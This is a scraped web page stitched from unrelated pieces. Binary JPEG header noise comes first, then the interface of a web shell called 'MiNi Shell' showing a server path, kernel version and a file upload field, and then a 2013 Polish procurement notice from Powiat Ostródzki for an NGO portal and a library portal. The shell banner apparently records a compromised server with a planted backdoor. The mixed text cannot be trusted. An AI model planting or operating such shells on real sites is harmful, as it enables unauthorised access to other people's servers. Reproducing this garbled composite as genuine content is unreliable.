JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/96833-N-2013.html

<p class="kh_header"><b>Ostróda: Utworzenie portalu Centrum Użyteczności Publicznej wraz z podstronami organizacji pozarządowych oraz portalu bibliotek@ dla Biblioteki Powiatowej w Ostródzie w ramach projektu e-cup - Internetowy Portal Integracyjny Organizacji Pozarządowych Powiatu Ostródzkiego</b><br>
<b>Numer ogłoszenia: 96833 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ostródzki z siedzibą w Ostródzie , ul. Jana III Sobieskiego 5, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 089 6429800, faks 089 6429817.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.ostroda.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie portalu Centrum Użyteczności Publicznej wraz z podstronami organizacji pozarządowych oraz portalu bibliotek@ dla Biblioteki Powiatowej w Ostródzie w ramach projektu e-cup - Internetowy Portal Integracyjny Organizacji Pozarządowych Powiatu Ostródzkiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa utworzenia portalu Centrum Użyteczności Publicznej wraz z podstronami organizacji pozarządowych oraz portalu bibliotek@ dla Biblioteki Powiatowej w Ostródzie w ramach projektu e-cup - Internetowy Portal Integracyjny Organizacji Pozarządowych Powiatu Ostródzkiego, współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007 - 2013, zgodnie z Opisem szczegółowym stanowiącym załącznik nr 1 do wzoru wniosku o dopuszczenie do udziału w postępowaniu (dalej wzór wniosku) oraz rzutami kondygnacji stanowiącymi załącznik nr 7 do wzoru wniosku, w zakresie:

Część 1 - Portal e-CUP
1.1. Informacje ogólne
Przedmiotem zamówienia jest zaprojektowanie, wykonanie, wdrożenie i utrzymanie portalu internetowego, którego zadaniem będzie przekazywanie informacji dotyczących działalności Centrum Użyteczności Publicznej w Ostródzie oraz działających w nim organizacji pozarządowych z terenu Powiatu Ostródzkiego.
Portal został podzielony na serwis główny tzn. portal e-CUP oraz serwisy podrzędne czyli podstrony organizacji pozarządowych.
Grupę docelową portalu stanowią osoby zainteresowane działalnością sektora pozarządowego. Serwis powinien zapewnić bezawaryjne działanie dla 100 użytkowników korzystających jednocześnie z serwisów.

1.2. Wymagania techniczne
Ogólne cechy portalu i podstron:
1)technologia wykonania HTML/XHTML, CSS, PHP, Javascript, Flash lub HTML5 - do odtwarzania multimediów,
2)silnik baz danych MySQL lub PostgreSQL,
3)zastosowana technologia wykonania umożliwiająca dalsze wykorzystywanie i rozwój systemu bez konieczności ponoszenia opłat licencyjnych,
4)budowa modułowa z możliwością rozbudowy o kolejne moduły,
5)portal oparty o system CMS (Content Management System),
6)portal musi spełniać standardy W3C,
7)kodowanie znaków w UTF-8,
8)portal e-CUP dostępny w polskiej wersji językowej oraz skróconej angielskiej i niemieckiej,
9)portal e-CUP oraz podstrony organizacji pozarządowych muszą funkcjonować na odrębnych bazach danych z odrębną lokalizacją plików.

Warstwa wizualna portalu i podstron:
1)Wykonawcy, którzy zostaną zaproszeni do udziału w postępowaniu, na etapie składania ofert wstępnych, wraz z ofertą wstępną, przedłożą  wstępną koncepcję wizualną i funkcjonalną wraz z opisem technicznym proponowanego portalu. Zamawiający, na podstawie przedstawionych propozycji oraz po przeprowadzeniu negocjacji z ww. Wykonawcami,  dokona doprecyzowania i ewentualnego uzupełnienia opisu przedmiotu zamówienia, który przekaże Wykonawcom wraz z zaproszeniem do składania ofert, 
2)Wykonawca opracuje szaty okolicznościowe portalu tj. żałobną, Bożonarodzeniową oraz Wielkanocną,
3)koncepcja wizualna szablonu strony musi być jednolita dla portalu e-CUP i podstron organizacji pozarządowych oraz musi odzwierciedlać rolę, jaką pełni Centrum Użyteczności Publicznej w Ostródzie. Centrum Użyteczności Publicznej patronuje i wspiera działania kulturalne, edukacyjne, społeczne i inne na terenie Powiatu Ostródzkiego, podejmowane przez organizacje pozarządowe. Dlatego też ważne jest prezentowanie nie tylko społeczności lokalnej ale również szerszemu gronu działania podejmowane przez trzeci sektor i na rzecz trzeciego sektora,
4)każda organizacja pozarządowa musi mieć możliwość umieszczenia na swojej podstronie własnego logotypu oraz nazwy organizacji wkomponowanej w szatę graficzną strony
5)możliwość przeglądania portalu na ekranach telefonów komórkowych i innych urządzeniach mobilnych zalecane zastosowanie rozwiązania Responsive Web Design,
6)poprawne wyświetlanie oraz funkcjonowanie w najnowszych wersjach przeglądarek internetowych Mozilla Firefox, Google Chrome, Opera, Internet Explorer, Safari,
7)możliwość włączenia i wyłączenia trybu tekstowego z wysokim kontrastem,
8)stopniowe powiększenie i pomniejszenie wielkości czcionki,
9)możliwość nawigacji z poziomu klawiatury (bez użycia myszki),
10)możliwość odsłuchania treści artykułów (synteza mowy w czasie rzeczywistym) bez limitu czasowego, limitu odsłuchań oraz bez konieczności instalowania przez Internautę dodatkowego oprogramowania. Odsłuchania strony przez Internautów nie mogą wiązać się z dodatkowymi kosztami dla Zamawiającego. Dostarczenie przez Wykonawcę odpowiedniej wersji oprogramowania do syntezy mowy z licencją minimum na 5 lat od daty podpisania protokołu zdawczo-odbiorczego, 
11)możliwość wydrukowania artykułu z poziomu portalu,
12)możliwość wygenerowania pliku PDF z treścią artykułu,
13)możliwość włączenia szaty okolicznościowej tj. żałobnej, Bożonarodzeniowej, Wielkanocnej, 
14)możliwość wyłączenia portalu i wyświetlenia informacji o przerwie technicznej,
15)wbudowana wyszukiwarka treści (słowa, frazy),
16)poleć znajomemu (możliwość polecenie artykułu),
17)możliwość wyświetlenia i edycji informacji o wykorzystywaniu ciasteczek (cookies),
18)Zamawiający nie dopuszcza wyświetlania komercyjnych reklam pod jakąkolwiek postacią,
19)każda strona portalu musi być oznakowana logotypami zgodnie z wytycznymi Regionalnego Programu Operacyjnego Warmii i Mazur www.rpo.warmia.mazury.pl
20) dostęp do statystyki odwiedzin portalu e-CUP (akceptowalne Google Analytics, Piwik itp.).

System Zarządzania Treścią (CMS) - struktura uprawnień:
1)hierarchiczna struktura uprawnień,
2)separacja i podział na operatorów portalu e-CUP i podstron  organizacji pozarządowych,
3)nielimitowana liczba operatorów portalu e-CUP i podstron organizacji pozarządowych, (administratorów, redaktorów),
4)możliwość przydzielania przez administratora uprawnień do poszczególnych modułów portalu lub kategorii artykułów.

System Zarządzania Treścią (CMS) - edycja treści:
1)edytor WYSIWIG z możliwością:
a)formatowania tekstu (pogrubienie, pochylenie, podkreślenie),
b)wyrównywania tekstu (do lewej, wyśrodkowany, do prawej, wyjustowany),
c)zmiany koloru i fontu,
d)numerowania lub wypunktowania,
e)wstawianie linków w treści,
f)umieszczania treści multimedialnych (z zewnętrznego adresu lub lokalnych zasobów serwera),
g)tworzenia tabel,
h)umieszczania w treść linków do dowolnego typu plików,
i)wklejania treści z popularnych edytorów tekstów,
2)publikacja treści multimedialnych w formatach mpg, avi, flv, jpg, gif, png, mp3
a)materiały video z możliwością samodzielnego określenia rozmiarów odtwarzacza,
3)możliwość dodawania do artykułów dokumentów do pobrania oraz zarządzania ich kolejnością i opisami, podczas ich prezentacji automatycznie rozpoznawane powinny być formaty dokumentów (doc-docx, pdf, xls-xlsx, odt) charakteryzowane ikoną oraz wielkość załącznika (KB), prezentowana przy linku pliku do pobrania,
4)możliwość tagowania treści (artykuły, multimedia),
5)możliwość powiązywania artykułów,
6)możliwość określenia ramy czasowej publikacji artykułu, ankiety (od - do),
7)kreator formularzy - możliwość wygenerowania dowolnego formularza i osadzenia go na dowolnej podstronie serwisu,
8)wbudowany edytor html,
9)możliwość znakowania artykułów datą wytworzenia informacji, datą ostatniej zmiany informacji, autorem który wprowadził informację,
10)możliwość generowania z poziomu CMS portalu e-CUP nowych podstron dla organizacji pozarządowych o domyślnej strukturze zgodnej ze schematem nr 2 oraz z możliwością określenia adresu URL (subdomena lub ścieżka dostępu) oraz nadania uprawnień administratorowi podstony organizacji pozarządowej,
11)ilość możliwych podstron do wygenerowania - 20 szt.,
12)nowa podstrona otrzyma swój odrębny panel administracyjny z możliwością zarządzania operatorami podstron, edycją treści, dostępem do modułu ankiet, modułu kalendarza, własnej galerii, oraz kreatora formularzy,
13)portal e-CUP oraz podstrony organizacji pozarządowych będą mogły wymieniać między sobą dane (np. aktualności - publikowane w portalu podrzędnym będą mogły być dostępne w portalu głównym po zatwierdzeniu przez administratora),
14)możliwość usunięcia, deaktywacji podstrony organizacji pozarządowych z poziomu CMS portalu e-CUP.

System bezpieczeństwa:
1)obsługa protokołu HTTPS dla paneli zarządzania treścią - certyfikat zapewnia Wykonawca. Termin ważności certyfikatu minimum pięć lat od dnia podpisania protokołu zdawczo-odbiorczego,
2)hasła dostępowe przechowywane w postaci nieodwracalnego skrótu (hash),
3)minimalna siła hasła dostępowego do CMS: 8 znaków (małe i duże litery, cyfry, symbole) z walidacją,
4)minimalna siła hasła dostępowego do forum: 8 znaków,
5)możliwość zresetowania hasła z powiadomieniem na e-mail,
6)automatyczne wylogowanie nieaktywnej sesji,
7)portale muszą być odporne na znane ataki typu: SQL injection, shellinjection, cross-sitescripting, HTTP responsesplitting, codeinjection, sessionfixation, sessionpoisoning, e-mail injection,

Hosting
Hosting zapewnia Wykonawca cedując prawa na Zamawiającego, hosting na okres minimum pięciu lat od dnia podpisania protokołu zdawczo-odbiorczego.
Wymagane jest dostosowanie bazy danych, aplikacji i serwera do wymagań Generalnego Inspektora Ochrony Danych Osobowych. W ramach hostingu wymagane jest zapewnienie bezpieczeństwa poprzez m.in.:
1)bezprzerwowego zasilania awaryjnego,
2)co najmniej dwóch niezależnych łączy do Internetu różnych operatorów z zastosowaniem routingu BGP,
W ramach świadczonej usługi hostingowej Wykonawca zapewni:
1)rozwiązywanie problemów z działaniem sprzętu serwerowego,
2)utrzymanie i administrację systemu operacyjnego serwera,
3)wykonywanie kopii bezpieczeństwa systemu oraz baz danych. Minimalny okres przechowywania danych: 1 miesiąc,
4)możliwość odtwarzania systemów z kopii bezpieczeństwa,
5)infrastrukturę sprzętową oraz łącza o przepustowości umożliwiające obsłużenie portali.

Wdrożenie:
1)w ramach wdrożenia Wykonawca opracuje i dostarczy szczegółową instrukcję obsługi  portalu dla redaktorów i administratorów CMS, zawierającą szczegółowy opis wszystkich funkcji i możliwości systemu oraz przewodniki w formie How-to w postaci pytań, jak zrealizować określoną operację w systemie i szczegółowych (krok po kroku wraz ze zrzutami z ekranu) odpowiedzi na nie,
2)Wykonawca zapewni wsparcie dla operatorów portalu przez okres 6 miesięcy poprzez konsultacje indywidualne z administratorami i redaktorami portalu i podstron,
3)w ramach wdrożenia Wykonawca opracuje i dostarczy szczegółową dokumentację powykonawczą (m.in. instalacja, konfiguracja i parametryzacja systemu, struktura baz danych wraz z opisem przeznaczenia tabel i pól) oraz opis procedur i instrukcji eksploatacyjnych, a w szczególności procedury i instrukcje:
a)wykonania kopii systemu i jej odtworzenia,
b)bieżącego monitoringu oraz utrzymania systemu,
c)postępowania w razie wystąpienia wad wraz z formularzami zgłoszeniowymi i osobami kontaktowymi (nr telefonu, fax, e-mail) do konsultacji rozwiązywania zaistniałych problemów.

Gwarancja i licencja
1)Wykonawca zobowiązuje się do świadczenia usług gwarancyjnych przez okres minimum 5 lat od daty podpisania protokołu zdawczo-odbiorczego w szczególności usuwania wad portalu oraz wad konfiguracji systemu,
2)Wykonawca zobowiązuje się do aktualizacji portalu pod względem bezpieczeństwa oraz zapewni i wykona instalację stosownych łatek na własny koszt przez okres minimum  5 lat od daty podpisania protokołu zdawczo-odbiorczego,
3)Wykonawca dostarczy bezterminowe licencje na oprogramowanie dla portalu wraz z kodami źródłowymi. Licencja udzieli prawa Zamawiającemu do kopiowania i umieszczania na dowolnych nośnikach oraz modyfikowania na własną odpowiedzialność i własne potrzeby. Licencja pozwoli przede wszystkim na nieograniczone co do liczby użytkowników i czasu użytkowanie programu. Zamawiający nie będzie udostępniał kodu źródłowego innym firmom i instytucjom oraz bierze odpowiedzialność za pracowników, którzy wejdą w jego posiadanie. Zamawiający nie będzie odsprzedawał oraz dzierżawił kodu źródłowego. W przypadku korzystania przez Wykonawcę z rozwiązań opartych na licencji GNU lub Open Source licencja udzielona przez Wykonawcę na użytkowanie produktu końcowego musi być zgodna z wymogami powyższych licencji. W takim przypadku Wykonawca dostarczy Zamawiającemu pełną treść obu licencji na produkt.
4)Wykonawca w dniu spisania protokołu zdawczo - odbiorczego, stanowiącego zakończenie realizacji umowy złoży oświadczenie o nieodpłatnym przeniesieniu na Zamawiającego całości autorskich praw majątkowych (nieograniczonych czasowo ani terytorialnie) w rozumieniu ustawy z dnia 4 lutego 1994r. o prawie autorskim i prawach pokrewnych.

Część 2 -  Portal bibliotek@
1.1. Informacje ogólne.
Celem projektu jest zaprojektowanie, wykonanie, wdrożenie i utrzymanie portalu internetowego, którego zadaniem będzie przekazywanie informacji dotyczących działalności Powiatowej Biblioteki Publicznej w Ostródzie oraz możliwość korzystania z e-usług świadczonych przez bibliotekę, przeglądania katalogów zbiorów, itp. Serwis internetowy oparty na technologii systemu CMS, z elementami portalu społecznościowego (chat), będący ogólnodostępną częścią projektu. 
Serwis powinien zapewnić bezawaryjne działanie dla 50 użytkowników korzystających jednocześnie z systemu.
2.Wymagania techniczne.

Ogólne cechy portalu:
1)technologia wykonania HTML/XHTML, CSS, PHP, Javascript, Flash lub HTML5 - do odtwarzania multimediów,
2)silnik baz danych MySQL lub PostgreSQL,
3)zastosowana technologia wykonania umożliwiająca dalsze wykorzystywanie i rozwój systemu bez konieczności ponoszenia opłat licencyjnych,
4)budowa modułowa z możliwością rozbudowy o kolejne moduły,
5)portal oparty o system CMS (Content Management System),
6)portal musi spełniać standardy W3C,
7)kodowanie znaków w UTF-8.

Warstwa wizualna portalu:
1)Wykonawcy, którzy zostaną zaproszeni do udziału w postępowaniu, na etapie składania ofert wstępnych, wraz z ofertą wstępną, przedłożą wstępną koncepcję wizualną i funkcjonalną wraz z opisem technicznym proponowanego portalu. Zamawiający, na podstawie przedstawionych propozycji oraz po przeprowadzeniu negocjacji z ww. Wykonawcami,  dokona doprecyzowania i ewentualnego uzupełnienia opisu przedmiotu zamówienia, który przekaże Wykonawcom  wraz z zaproszeniem do składania ofert, 
2)Wykonawca opracuje szaty okolicznościowe portalu tj. żałobną, Bożonarodzeniową oraz Wielkanocną,
3)koncepcja wizualna szablonu strony musi odzwierciedlać rolę jaką pełni Powiatowa Biblioteka Publiczna w Ostródzie. Biblioteka jest publiczną biblioteką powiatu. Zapewnia obsługę biblioteczną mieszkańcom powiatu. Służy rozwijaniu i zaspokajaniu potrzeb czytelniczych i informacyjnych mieszkańcom powiatu, upowszechnianiu wiedzy i nauki, rozwojowi kultury, dba o sprawne funkcjonowanie sieci bibliotecznej i systemu informacyjnego na terenie miasta i powiatu,
4)możliwość przeglądania portalu na ekranach telefonów komórkowych i innych urządzeniach mobilnych zalecane zastosowanie rozwiązania Responsive Web Design,
5)poprawne wyświetlanie oraz funkcjonowanie w najnowszych wersjach przeglądarek internetowych Mozilla Firefox, Google Chrome, Opera, Internet Explorer, Safari,
6)możliwość włączenia i wyłączenia trybu tekstowego z wysokim kontrastem,
7)stopniowe powiększenie i pomniejszenie wielkości czcionki,
8)możliwość nawigacji z poziomu klawiatury (bez użycia myszki),
9)możliwość odsłuchania treści artykułów (synteza mowy w czasie rzeczywistym) bez limitu czasowego, limitu odsłuchań oraz bez konieczności instalowania przez Internautę dodatkowego oprogramowania. Odsłuchania strony przez Internautów nie mogą wiązać się z dodatkowymi kosztami dla Zamawiającego. Dostarczenie przez Wykonawcę odpowiedniej wersji oprogramowania do syntezy mowy z licencją na minimum 5 lat od daty podpisania protokołu zdawczo-odbiorczego, 
10)możliwość wydrukowania artykułu z poziomu portalu,
11)możliwość wygenerowania pliku PDF z treścią artykułu,
12)możliwość włączenia szaty okolicznościowej tj. żałobnej, Bożonarodzeniowej, Wielkanocnej,
13)możliwość wyłączenia portalu i wyświetlenia informacji o przerwie technicznej,
14)wbudowana wyszukiwarka treści (słowa, frazy),
15)poleć znajomemu (możliwość polecenie artykułu),
16)możliwość wyświetlenia i edycji informacji o wykorzystywaniu ciasteczek (cookies),
17)Zamawiający nie dopuszcza wyświetlania komercyjnych reklam pod jakąkolwiek postacią,
18)każda strona portalu musi być oznakowana logotypami zgodnie z wytycznymi Regionalnego Programu Operacyjnego Warmii i Mazur www.rpo.warmia.mazury.pl
19)dostęp do statystyki odwiedzin portalu (akceptowalne Google Analytics, Piwik itp.)

System Zarządzania Treścią (CMS) - struktura uprawnień:
1)hierarchiczna struktura uprawnień,
2)nielimitowana liczba operatorów portalu,
3)możliwość przydzielania przez administratora uprawnień do poszczególnych modułów portalu lub kategorii artykułów,

System Zarządzania Treścią (CMS) - edycja treści:
1)edytor WYSIWIG z możliwością:
a)formatowania tekstu (pogrubienie, pochylenie, podkreślenie),
b)wyrównywania tekstu (do lewej, wyśrodkowany, do prawej, wyjustowany),
c)zmiany koloru i fontu,
d)numerowania lub wypunktowania,
e)wstawianie linków w treści,
f)umieszczania treści multimedialnych (z zewnętrznego adresu lub lokalnych zasobów serwera),
g)tworzenia tabel,
h)umieszczania w treść linków do dowolnego typu plików,
i)wklejania treści z popularnych edytorów tekstów,
2)publikacja treści multimedialnych w formatach mpg, avi, flv, jpg, gif, png, mp3
a)materiały video z możliwością samodzielnego określenia rozmiarów odtwarzacza,
3)możliwość dodawania do artykułów dokumentów do pobrania oraz zarządzania ich kolejnością i opisami, podczas ich prezentacji automatycznie rozpoznawane powinny być formaty dokumentów (doc-docx, pdf, xls-xlsx, odt) charakteryzowane ikoną oraz wielkość załącznika (KB), prezentowana przy linku pliku do pobrania,
4)możliwość tagowania treści (artykuły, multimedia),
5)możliwość powiązywania artykułów,
6)możliwość określenia ramy czasowej publikacji artykułu, ankiety (od - do),
7)kreator formularzy - możliwość wygenerowania dowolnego formularza i osadzenia go na dowolnej podstronie serwisu,
8)wbudowany edytor html,
9)możliwość znakowania artykułów datą wytworzenia informacji, datą ostatniej zmiany informacji, autorem który wprowadził informację,

System bezpieczeństwa:
1)obsługa protokołu HTTPS dla panelu zarządzania treścią - certyfikat zapewnia Wykonawca. Termin ważności certyfikatu minimum pięć lat od dnia podpisania protokołu zdawczo-odbiorczego,
2)hasła dostępowe przechowywane w postaci nieodwracalnego skrótu (hash),
3)minimalna siła hasła dostępowego do CMS: 8 znaków (małe i duże litery, cyfry, symbole) z walidacją,
4)możliwość zresetowania hasła z powiadomieniem na e-mail,
5)automatyczne wylogowanie nieaktywnej sesji,
6)portal musi być odporny na znane ataki typu: SQL injection, shellinjection, cross-sitescripting, HTTP responsesplitting, codeinjection, sessionfixation, sessionpoisoning, e-mail injection.

Hosting
Hosting zapewnia Wykonawca cedując prawa na Zamawiającego, hosting na okres minimum pięciu lat od dnia podpisania protokołu zdawczo-odbiorczego.
Wymagane jest dostosowanie bazy danych, aplikacji i serwera do wymagań Generalnego Inspektor Ochrony Danych Osobowych. W ramach hostingu wymagane jest zapewnienie bezpieczeństwa poprzez m.in.:
1)bezprzerwowego zasilania awaryjnego,
2)co najmniej dwóch niezależnych łączy do Internetu różnych operatorów z zastosowaniem routingu BGP,
W ramach świadczonej usługi hostingowej Wykonawca zapewni:
1)rozwiązywanie problemów z działaniem sprzętu serwerowego,
2)utrzymanie i administrację systemu operacyjnego serwera,
3)wykonywanie kopii bezpieczeństwa portalu oraz baz danych. Minimalny okres przechowywania danych: 1 miesiąc,
4)możliwość odtwarzania portalu z kopii bezpieczeństwa
5)infrastrukturę sprzętową oraz łącza o przepustowości umożliwiające obsłużenie portalu

Wdrożenie:
1)w ramach wdrożenia Wykonawca opracuje i dostarczy szczegółową instrukcję obsługi  portalu dla redaktorów i administratorów CMS, zawierającą szczegółowy opis wszystkich funkcji i możliwości systemu oraz przewodniki w formie How-to w postaci pytań, jak zrealizować określoną operację w systemie i szczegółowych (krok po kroku wraz ze zrzutami z ekranu) odpowiedzi na nie,
2)Wykonawca zapewni wsparcie dla operatorów portalu przez okres 6 miesięcy poprzez konsultacje indywidualne z administratorami i redaktorami portalu i podstron,
3)w ramach wdrożenia Wykonawca opracuje i dostarczy szczegółową dokumentację powykonawczą (m.in. instalacja, konfiguracja i parametryzacja systemu, struktura baz danych wraz z opisem przeznaczenia tabel i pól) oraz opis procedur i instrukcji eksploatacyjnych, a w szczególności procedury i instrukcje:
a)wykonania kopii systemu i jej odtworzenia,
b)bieżącego monitoringu oraz utrzymania systemu,
c)postępowania w razie wystąpienia wad wraz z formularzami zgłoszeniowymi i osobami kontaktowymi (nr telefonu, fax, e-mail) do konsultacji rozwiązywania zaistniałych problemów,

Gwarancja i licencja
1)Wykonawca zobowiązuje się do świadczenia usług gwarancyjnych przez okres minimum 5 lat od daty podpisania protokołu zdawczo-odbiorczego w szczególności usuwania wad portalu oraz wad konfiguracji systemu,
2)Wykonawca zobowiązuje się do aktualizacji portalu pod względem bezpieczeństwa oraz zapewni i wykona instalację stosownych łatek na własny koszt przez okres minimum 5 lat od daty podpisania protokołu zdawczo-odbiorczego,
3)Wykonawca dostarczy bezterminowe licencje na oprogramowanie dla portalu wraz z kodami źródłowymi. Licencja udzieli prawa Zamawiającemu do kopiowania i umieszczania na dowolnych nośnikach oraz modyfikowania na własną odpowiedzialność i własne potrzeby. Licencja pozwoli przede wszystkim na nieograniczone co do liczby użytkowników i czasu użytkowanie programu. Zamawiający nie będzie udostępniał kodu źródłowego innym firmom i instytucjom oraz bierze odpowiedzialność za pracowników, którzy wejdą w jego posiadanie. Zamawiający nie będzie odsprzedawał oraz dzierżawił kodu źródłowego. W przypadku korzystania przez Wykonawcę z rozwiązań opartych na licencji GNU lub Open Source licencja udzielona przez Wykonawcę na użytkowanie produktu końcowego musi być zgodna z wymogami powyższych licencji. W takim przypadku Wykonawca dostarczy Zamawiającemu pełną treść obu licencji na produkt,
4)Wykonawca w dniu spisania protokołu zdawczo - odbiorczego, stanowiącego zakończenie realizacji umowy złoży oświadczenie o nieodpłatnym przeniesieniu na Zamawiającego całości autorskich praw majątkowych (nieograniczonych czasowo ani terytorialnie) w rozumieniu ustawy z dnia 4 lutego 1994r. o prawie autorskim i prawach pokrewnych.

U W A G A:
1.Przedmiotem negocjacji z Wykonawcami będzie opis przedmiotu zamówienia. Zamawiający oczekuje, że w trakcie negocjacji wykonawcy na podstawie posiadanej wiedzy i doświadczenia zaproponują najkorzystniejsze dla Zamawiającego rozwiązania odpowiadające jego potrzebom i oczekiwaniom. Po zakończeniu negocjacji Zamawiający doprecyzuje opis przedmiotu zamówienia i zaprosi Wykonawców do składania ofert.  
2.Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć, że Zamawiający podał opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno -eksploatacyjno-użytkowych nie gorszych niż te, które zostały podane w opisie przedmiotu zamówienia. Podstawa prawna:  art. 29 ust. 3 Ustawy Prawo Zamówień Publicznych.</p>

